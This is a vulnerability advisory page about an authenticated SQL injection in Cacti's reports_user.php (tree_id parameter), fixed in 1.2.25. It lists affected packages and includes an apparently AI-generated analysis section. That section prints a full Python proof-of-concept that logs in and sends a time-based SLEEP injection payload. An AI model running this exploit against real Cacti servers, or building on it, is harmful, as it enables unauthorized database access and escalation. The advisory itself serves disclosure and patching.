Authenticated SQL injection vulnerability in reports_user.php in Cacti
Description
Cacti is an open source operational monitoring and fault management framework. An authenticated SQL injection vulnerability was discovered which allows authenticated users to perform privilege escalation and remote code execution. The vulnerability resides in the reports_user.php file. In ajax_get_branches, the tree_id parameter is passed to the reports_get_branch_select function without any validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
13<1.2.25+ 1 more
- (no CPE)range: <1.2.25
- (no CPE)range: < 1.2.25
- osv-coords11 versionspkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.5pkg:rpm/opensuse/cacti&distro=openSUSE%20Tumbleweedpkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.5pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP5pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP5
< 1.2.25-bp155.2.3.1+ 10 more
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-2.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
Patches
Vulnerability mechanics
Root cause
"The `tree_id` parameter is passed to the `reports_get_branch_select` function without validation, leading to SQL injection."
Attack vector
An authenticated user can exploit this vulnerability by sending a crafted `tree_id` parameter to the `ajax_get_branches` action in `reports_user.php`. The `tree_id` is directly incorporated into an SQL query's WHERE clause when its value is greater than 0. This allows an attacker to inject malicious SQL code, such as a `SLEEP` command to confirm the vulnerability, as demonstrated by the provided Python PoC [ref_id=1].
Affected code
The vulnerability resides in the `reports_user.php` file, specifically within the `ajax_get_branches` case. The `tree_id` parameter is passed to the `reports_get_branch_select` function without sanitization. The `reports_get_branch_select` function then uses this unvalidated `tree_id` in a SQL query's WHERE clause [ref_id=1].
What the fix does
The advisory indicates that the vulnerability is addressed in version 1.2.25 and later. The fix involves properly validating the `tree_id` parameter before it is used in the SQL query. This prevents the injection of arbitrary SQL code, thereby mitigating the risk of privilege escalation and remote code execution.
Preconditions
- authThe attacker must be an authenticated user.
Reproduction
By running the following Python3 code, you will observe a delay of 10 seconds in the response, which indicates the occurrence of SQL injection. ```python import argparse import requests import sys import urllib3
#import os #os.environ['http_proxy'] = 'http://localhost:8080'
sleep_time = 10 payload = f"1));SELECT SLEEP({sleep_time})-- -"
def get_csrf_token(): url = f"{target}/index.php" res_body = session.get(url).content.decode() csrf_token = res_body.split('var csrfMagicToken = "')[1].split('"')[0] if not csrf_token: print("[-] Unable to find csrf_token") sys.exit() return csrf_token
def login(username,password): login_url = f"{target}/index.php"
csrf_token = get_csrf_token() data = {'action':'login','login_username':username,'login_password':password,'__csrf_magic':csrf_token} res_body = session.post(login_url,data=data).content.decode() if 'You are now logged into <' in res_body: print('[+] Login successful!') else: print('[-] Login failed. Check your credentials') sys.exit()
def exploit(): url = f"{target}/reports_user.php"
params = { 'action':'ajax_get_branches', 'tree_id':payload }
print('[+] Sending payload...') print(f"[+] Payload: {payload}") session.get(url,params=params) if __name__=='__main__': urllib3.disable_warnings() parser = argparse.ArgumentParser(description="Cacti 1.2.24 - reports_user.php 'tree_id' SQL Injection (authenticated)") parser.add_argument('-t','--target',help='',required=True) parser.add_argument('-u','--username',help='',required=True) parser.add_argument('-p','--password',help='',required=True) args = parser.parse_args() username = args.username password = args.password target = args.target session = requests.Session()
login(username,password) exploit() ``` [ref_id=1]
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- github.com/Cacti/cacti/security/advisories/GHSA-gj95-7xr8-9p7gmitrex_refsource_CONFIRM
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/mitre
News mentions
0No linked articles in our index yet.